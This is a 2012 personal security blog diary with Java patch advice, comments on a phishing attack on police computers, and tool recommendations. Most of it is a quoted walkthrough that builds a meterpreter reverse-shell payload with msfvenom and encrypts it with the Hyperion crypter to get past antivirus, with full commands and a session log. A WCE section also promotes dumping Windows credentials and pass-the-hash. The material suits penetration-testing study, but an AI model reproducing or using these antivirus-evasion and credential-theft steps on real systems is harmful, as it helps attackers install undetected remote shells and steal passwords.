Latest Security News

Weekly diary, 21-27 October 2012

I thought I would jot down for myself the main points of the security events and other interesting things I ran into over the past week - I haven't settled on which day yet - but the idea is to keep it up... hmm, hard... OK, let's start with a trial:


1. Java update - the same old tune again... for anyone who hasn't updated yet, now is the time to upgrade to 6.37 or 7.09. You can first identify the installed Java version through this site and then go on to the Java site to upgrade - or alternatively upgrade automatically. By the way, no fix has yet been written for the latest vulnerability submitted for review by a Polish information security researcher - according to Oracle it will be handled in the first quarter of 2013. Anyone who doesn't need to run Java-based applications is advised to remove the browser plugin for Java, and in any case to work with Chrome or FF and not with IE.


2. Intrusion attempt and cyber attack on police computers - more details here. From a first reading, the attempt resembles dozens of attempts to persuade someone to click a link or open a file sent by email; such emails are usually related to cyber crime, but in this specific case it may have been a cyber-terror attack by Iran (so claim the security experts who investigated the matter). The extreme step of disconnecting the police computers from the internet and from other systems for fear of data leakage, and on top of that blocking USB flash drives (disk-on-key) across the whole organization, looks a bit puzzling to me.
    • Doesn't the police have data-leakage monitoring systems that run continuously in the background?
    • Doesn't the police have the ability to analyze suspicious connections going from inside the organization out to the internet?
    • Why aren't USB flash drives blocked by default?
    • Beyond the anti-virus installed on the mail system - why doesn't the police block every dangerous file type such as EXE and DLL??? Every such file should be dropped into a special mailbox that is released only by information security staff.
    • In short, it looks like there was plenty of panic and harsh decisions here.
  

Radware launches new DDoS security site

www.DDoSWarriors.com
Provides comprehensive analysis on DoS and DDoS attack tools, trends, and threats
There is very interesting and comprehensive material here on denial-of-service attacks, tools, news, etc.
I have had the chance to meet and even hear a lecture from Radware's experts, and they clearly have a huge and unique body of knowledge.
Recommended!



Anti-virus evasion technique - Hyperion tool

A special method that uses encryption to prevent detection of a malicious file by anti-virus products.

Below are the instructions for use on bt5r3 to compile the hyperion code and use it on a chosen EXE:
I checked and it works!


taken from
****
I recently watched a presentation that rel1k gave at bSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated Binary Droppers, Shellcodeexec, Powershell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE Packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted and encapsulated with a weak 128-bit AES key, which is simply brute forced at the time of execution. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools needed to cross-compile executables.
root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
Now that we have our Hyperion crypter executable, let’s create a Metasploit payload.
root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe
Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.
As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.
root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe
And if we copy our encrypted payload to our Windows host…
Ah, nothing to see here :-) Let’s see if it works.
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)
Oh, you know that’s right!
You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for detection. So, your best option for testing custom payloads is to simply install the version of anti-virus that you are trying to bypass.
Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors could easily create a signature for these payloads. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in a later post. Happy Crypting!
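The crypter output above walks the input file's structure (MZ signature, e_lfanew, PE signature, PE32 magic, image base, data directory count, section table); the following added example, not Hyperion's or the quoted post's code, does the same walk in Python, and its is_pe() check is the kind of content-based test (executable recognised by its header, not by its extension) that the mail-gateway point in the police item above calls for. The sample image it parses is constructed, headers only, with section values taken from the log.

```python
import struct

def parse_pe32(data):
    # Walk DOS header -> PE signature -> COFF/optional header -> section table,
    # returning the fields the crypter log prints for its input file.
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]   # SizeOfOptionalHeader
    opt = pe_off + 24                                           # optional header start
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 file")
    info = {"pe_offset": pe_off,
            "image_base": struct.unpack_from("<I", data, opt + 28)[0],
            "size_of_image": struct.unpack_from("<I", data, opt + 56)[0],
            "num_dirs": struct.unpack_from("<I", data, opt + 92)[0],
            "sections": []}
    for i in range(nsec):                                       # 40-byte section headers
        name, vsize, vaddr, rawsize, rawaddr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        info["sections"].append({"name": name.rstrip(b"\0").decode(), "vsize": vsize,
                                 "vaddr": vaddr, "rawsize": rawsize, "rawaddr": rawaddr})
    return info

def is_pe(data):
    # Content-based check for an executable attachment, independent of its extension.
    try:
        parse_pe32(data)
        return True
    except (ValueError, struct.error):
        return False

def build_sample_pe():
    # Constructed, headers-only PE32 image (not runnable); .text/.rdata values mirror the log.
    dos = bytearray(0xE8)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0xE8)     # e_lfanew, as in the log
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    struct.pack_into("<I", opt, 56, 0x16000)    # SizeOfImage
    struct.pack_into("<I", opt, 92, 16)         # NumberOfRvaAndSizes
    hdr = "<8sIIIIIIHHI"
    secs = struct.pack(hdr, b".text", 0xA966, 0x1000, 0xB000, 0x1000, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack(hdr, b".rdata", 0xFE6, 0xC000, 0x1000, 0xC000, 0, 0, 0, 0, 0x40000040)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs
```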


Recommended lecture by Iftach Amit - Sexy Defense

From DerbyCon 2012 - a lecture by Iftach Amit about playing good defense.
Watch it.

Cyber Security Events Timeline

A very nice timeline of events which includes cyber crime, cyber warfare and other important security events.

Check it out here.


Cool SciFi Name Generator


Need a nickname? A fake identity?
Consider trying this site:

Windows Credentials Editor recommended - post-exploitation password dumping / pass-the-hash / Kerberos and more


A tool for exposing passwords and also for pass-the-hash, which works on Win7 and Server 2008 too.
What makes it unique is that the reading is done directly from memory and not through files (SAM, registry, etc.).
Don't forget to try wce -w :-)


taken from their site:

What is WCE?
Windows Credentials Editor (WCE) is a security tool that allows users to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' Kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.

What is the current version?
The current version of WCE 32bit is v1.3beta; you can download it here and the current version of WCE 64bit is v1.3beta; you can download it here.